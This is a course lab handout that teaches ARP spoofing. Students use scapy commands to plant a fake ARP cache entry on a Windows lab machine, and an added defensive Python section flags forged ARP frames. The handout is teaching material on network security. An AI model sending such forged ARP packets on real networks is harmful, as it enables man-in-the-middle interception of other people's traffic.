CNIT 123 Project X13: ARP Spoofing with scapy (10 pts.)

What you need

Purpose

We will craft a packet to add a fake cached ARP entry on the target computer. Planting fake ARP entries like this is how ARP-based man-in-the-middle attacks work. Understanding how ARP works is essential for network engineers and security professionals.

Start the Windows Machine

Start the Windows machine.

Finding the IP Address of the Windows Machine

On the Windows machine, open a Command Prompt window and execute the IPCONFIG command.

Make a note of your IP address for later reference.

Clearing the ARP Cache on the Windows Machine

On the Windows machine, open a Command Prompt window and execute these commands:

arp -d *

arp -a

This erases the old ARP entries from the cache. You may completely empty the cache, as shown below on this page, or merely reduce it to just a few entries.

Installing scapy on the Linux Machine

If you are using BackTrack 4 R2, scapy is already installed.

If you are using Ubuntu, use this command on the Attacker Linux machine to install it:

sudo apt-get install python-scapy

Sending an ARP from scapy

On the Linux machine, start scapy with this command:

sudo scapy

At the scapy prompt, enter these commands:

a = ARP()

a.display()

The attributes of the ARP object named "a" are displayed, as shown below on this page.

On the Linux machine, in scapy, enter these commands.

In the first command, enter the IP address of your Windows target machine.

The MAC and IP addresses in the second and third command are intentionally fake--leave them as they are.

The last MAC address is a broadcast address--leave it as it is.

a.pdst="192.168.198.139"

a.hwsrc="11:11:11:11:11:11"

a.psrc="1.1.1.1"

a.hwdst="ff:ff:ff:ff:ff:ff"

send(a)

The commands are shown in the figure below on this page.

Viewing the ARP Cache on the Windows Machine

On the Windows machine, open a Command Prompt window and execute this command:

arp -a

The fake entry should be visible, with an "Internet Address" of 1.1.1.1 and a "Physical Address" of 11-11-11-11-11-11, as shown below on this page.
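
Seen from the defender's side, the frame crafted above stands out on the wire. The following is an added example, not part of the original project: it parses a raw Ethernet ARP frame and lists the reasons it looks forged. The sample frames are constructed, and the 192.168.198.0/24 subnet and the 02:00:00:00:00:0x Ethernet source addresses are assumptions.

```python
import ipaddress
import struct

LOCAL_NET = ipaddress.ip_network("192.168.198.0/24")  # assumed lab subnet (not on the page)

def mac(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_arp_frame(frame):
    """Parse an Ethernet II frame carrying IPv4-over-Ethernet ARP."""
    if len(frame) < 42:
        raise ValueError("frame too short for Ethernet + ARP")
    eth_dst, eth_src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != 0x0806:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = struct.unpack(
        "!HHBBH6s4s6s4s", frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not IPv4-over-Ethernet ARP")
    return {
        "eth_src": mac(eth_src), "eth_dst": mac(eth_dst), "op": op,
        "hwsrc": mac(sha), "psrc": str(ipaddress.IPv4Address(spa)),
        "hwdst": mac(tha), "pdst": str(ipaddress.IPv4Address(tpa)),
    }

def arp_anomalies(pkt, local_net=LOCAL_NET):
    """Return the reasons a parsed ARP packet looks forged (empty if none)."""
    reasons = []
    if pkt["hwsrc"] != pkt["eth_src"]:
        reasons.append("ARP sender MAC differs from Ethernet source MAC")
    if ipaddress.ip_address(pkt["psrc"]) not in local_net:
        reasons.append("sender IP is outside the local subnet")
    # Heuristic: requests (op 1) normally carry an all-zero target MAC.
    if pkt["op"] == 1 and pkt["hwdst"] != "00:00:00:00:00:00":
        reasons.append("request carries a non-zero target MAC")
    return reasons

# Constructed samples: the project's forged ARP and an ordinary request.
# Ethernet source MACs 02:00:00:00:00:01 / :02 are placeholders (assumed).
FORGED = bytes.fromhex(
    "ffffffffffff" "020000000001" "0806" "0001080006040001"
    "111111111111" "01010101" "ffffffffffff" "c0a8c68b")
NORMAL = bytes.fromhex(
    "ffffffffffff" "020000000002" "0806" "0001080006040001"
    "020000000002" "c0a8c601" "000000000000" "c0a8c68b")

if __name__ == "__main__":
    for name, frame in (("forged", FORGED), ("normal", NORMAL)):
        print(name, arp_anomalies(parse_arp_frame(frame)))
```

The first check assumes the forged frame leaves the sender with the NIC's real address in the Ethernet header; a sender that also forges that field is caught only by the other two checks.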

Saving the Screen Image

Save a screen image with the filename Proj X13 from Your Name.

Turning in Your Project

Email the image to cnit.123@gmail.com with a Subject line of Proj X13 from Your Name.


Source

http://www.shelltoad.com/coding/arp-spoofing-with-scapy


Last modified: 5-1-12